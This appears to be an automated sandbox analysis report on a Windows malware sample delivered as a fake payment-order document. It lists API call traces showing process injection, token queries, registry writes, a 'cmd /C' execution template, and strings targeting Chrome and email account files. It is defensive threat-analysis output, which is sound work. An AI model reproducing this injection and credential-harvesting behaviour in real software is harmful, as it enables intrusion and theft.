    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy
  • String ID:
  • API String ID: 3418835849-0
  • Opcode ID: 48e92af7de5b1f14262d718c1bb04bd461a0a548bd9a3e9d293402e4cb923fe1
  • Instruction ID: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
  • Opcode Fuzzy Hash: 46D02B399919C4FB492B4468141036A4C8128283DD14C3553FC21055457F02318D3F26
  • Instruction Fuzzy Hash: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
  • lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: 524f9a7b75de6261c385ad020a1fd97dd94a45c24a600229a4b30a1cd107f5d7
  • Instruction ID: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
  • Opcode Fuzzy Hash: A0D0A9450DCCD2E2AA2A0C8B0C0C2200682ECB7B42C2C220435D01490DC3D1FEB0BF08
  • Instruction Fuzzy Hash: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,01B37494,01B31728,?,01B37494), ref: 01B32A0A
  • GetVersion.KERNEL32(?,01B37494), ref: 01B32A19
  • GetCurrentProcessId.KERNEL32(?,01B37494), ref: 01B32A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,01B37494), ref: 01B32A49
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: StrToIntExmemcpy
  • String ID: 0x
  • API String ID: 149130431-3225541890
  • Opcode ID: da5bbc278911b085aa6d66a47a0cf6d216f6515775abb5fb592028d0f4abd24f
  • Instruction ID: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
  • Opcode Fuzzy Hash: B3D0A750AA2F8381152564850252B35F667F8A2B537CC9F525E00D716A2F52B7762F0B
  • Instruction Fuzzy Hash: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
APIs
  • memcpy.NTDLL(?,?,?), ref: 001C7E65
  • StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001C7E77
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

General

Root Process Name:d3d8sext.exe
Process MD5:333EE1C0443D17DF5C79F6C4E40EA594
Total matches:150
Initial Analysis Report:Open
Initial sample Analysis ID:61981
Initial sample SHA 256:9DBA9F823DD79ECBC6F140568308797030998801F2F1E967C03058F1AC97F6FA
Initial sample name:Ilene_Levin_Payment_Order.doc

Similar Executed Functions

Similarity
  • Total matches: 36
  • API ID: CreateEventGetLastErrorRtlAddVectoredExceptionHandlerRtlRemoveVectoredExceptionHandlerStrRChr_struprlstrlen
  • String ID:
  • API String ID: 1244505096-0
  • Opcode ID: e7bdade24c4945e58ca902ffe0c9ca2f3df43dc30c200f231c9832c7f3637fe3
  • Instruction ID: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
  • Opcode Fuzzy Hash: 0AF099380984018E452FA8A8581471E4B0CB4827DB68C7F17FDE81006E5F4FF0E05FA9
  • Instruction Fuzzy Hash: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
APIs
  • StrRChrA.SHLWAPI(001EB090,00000000,0000005C), ref: 001CDA47
  • _strupr.NTDLL ref: 001CDA5D
  • lstrlen.KERNEL32(001EB090,?,001EC638), ref: 001CDA65
    • Part of subcall function 001D99D2: NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
    • Part of subcall function 001D99D2: NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
    • Part of subcall function 001D99D2: memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001D99D2: NtClose.NTDLL(001EC638), ref: 001D9A84
    • Part of subcall function 001D99D2: NtClose.NTDLL(?), ref: 001D9A8E
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,001EC638), ref: 001CDAE5
  • RtlAddVectoredExceptionHandler.NTDLL(00000000,001CD036), ref: 001CDB0C
    • Part of subcall function 001CD519: memset.NTDLL ref: 001CD561
    • Part of subcall function 001CD519: CreateMutexA.KERNEL32(00000000,00000001,00000000,0000005C,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD59C
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD5A7
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(001EB020), ref: 001CD5BF
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CD617
    • Part of subcall function 001CD519: NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 001CD65C
    • Part of subcall function 001CD519: OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD671
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD67B
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(00000000), ref: 001CD689
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000018), ref: 001CD716
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD79E
    • Part of subcall function 001CD519: LoadLibraryA.KERNEL32(001EC000), ref: 001CD7A9
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000071), ref: 001CD821
    • Part of subcall function 001CD519: wsprintfA.USER32 ref: 001CD849
  • GetLastError.KERNEL32(?,?,?,001EC638), ref: 001CDB26
  • RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CDB3C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
